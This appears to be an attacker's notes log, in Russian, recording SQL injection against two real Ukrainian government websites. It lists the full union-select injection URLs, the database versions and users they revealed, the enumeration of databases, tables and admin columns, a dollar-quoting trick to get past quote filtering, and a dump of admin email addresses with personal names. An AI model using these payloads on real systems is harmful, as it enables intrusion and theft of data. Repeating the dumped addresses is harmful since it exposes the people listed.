http://www.ses.gov.ua/?cont=9&news=8&idr=99999999999999'+union+select+1, concat_ws(0x3a,version(),user(),database(),@@versi on_compile_os)+from+information_schema
офiцiйну сторiнка Державної санiтарно-епiдемiологiчної служби м. Києва
версия: 5.0.76
пользователь: sim3_db6@88.214.192.26
БД:sim3_db6
ОС:unknown-linux-gnu
PostgreSQL
фонд державного майна Украины
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+1,2,3,4,5--+&noanons=noanons&all_news=&page=
имя базы данных: spfu_2
версия: PostgreSQL 8.0.8 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
пользователь spfu
узнаем другие базы
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,datname,null,datname,null+f rom+pg_database%20limit+1+offset+1--+&noanons=noanons&all_news=&page=
перебирал параметром оффсет:
spfu_2
template0
template1
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,table_name,null,null,null+f rom+information_schema.tables+limit+1+offset+0--+&noanons=noanons&all_news=&page=
таблицы
admin
answer
applicable_roles
article
check_constraints
circulate_history
...
узнаем колонки
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,column_name,null,null,null+ from+information_schema.columns+where+table_name=$ $admin$$+limit+1+offset+0--+&noanons=noanons&all_news=&page=
с $$ потому что кавыяка не проходит
надо сразу с типами
атрибуты admin:
email
id
inet_request
name
pr
ящики
http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,email,null,null,null+from+a dmin+limit+1+offset+0--+&noanons=noanons&all_news=&page=
_no_spam_natalik@ukr.net(Наташа (личный)
_no_spam_press@spfu.gov.ua(Наташа
askh@ukr.net(Олександр Степанович
kroshka@spfu.gov.ua(з приводу плати за оренду майна
marketing@spfu.gov.ua(Департамент маркетингу ФДМУ
rproekt@i.kiev.ua(Радіопроект